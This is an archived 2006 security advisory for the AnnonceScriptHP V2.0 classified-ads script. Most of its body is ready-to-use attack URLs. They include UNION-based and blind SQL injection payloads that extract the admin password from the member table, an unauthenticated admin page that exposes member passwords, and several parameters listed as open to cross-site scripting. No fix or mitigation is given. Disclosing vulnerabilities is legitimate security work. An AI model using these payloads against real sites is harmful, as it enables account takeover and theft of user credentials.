AOH :: HP Unsorted A :: C07-1251.HTM

AnnonceScriptHP V2.0 Multiple Vulnerabilities



AnnonceScriptHP V2.0 Multiple Vulnerabilities
AnnonceScriptHP V2.0 Multiple Vulnerabilities



AnnonceScriptHP V2.0
--------------------
Vendor site: http://www.scripthp.com/ 
Product: AnnonceScriptHP V2.0
Vulnerability: XSS & SQL Injection Vulnerability
Credits: Mr_KaLiMaN
Reported to Vendor: 02/12/06
Public disclosure: 09/12/06
 
Description:
------------
Password disclosure (all members):
http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=1 (1 for admin etc...) 


SQL Injection Vulnerability:
http://[victim]/[script_annonce_path]/email.php?id=[SQL INJECTION] 
http://[victim]/[script_annonce_path]/email.php?id=-1 UNION SELECT null,passe,pseudo FROM an_membre WHERE idmembre=1# 

http://[victim]/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION] 
http://[victim]/[script_annonce_path]/voirannonce.php?no=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98# 

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=[SQL INJECTION] 
http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=-1 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM etc...# 

http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.php?idannonce=[SQL INJECTION] 
http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.php?idannonce=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null# 


http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.php?idannonce=[SQL INJECTION] 
http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.php?idannonce=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98# 



XSS :
http://[victim]/[script_annonce_path]/erreurinscription.php?email=[XSS] 
http://[victim]/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS] 
http://[victim]/[script_annonce_path]/Templates/commun.dwt.php?email=[XSS] 
http://[victim]/[script_annonce_path]/Templates/membre.dwt.php?email=[XSS] 
http://[victim]/[script_annonce_path]/admin/admin_config/Aide.php?email=[XSS] 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.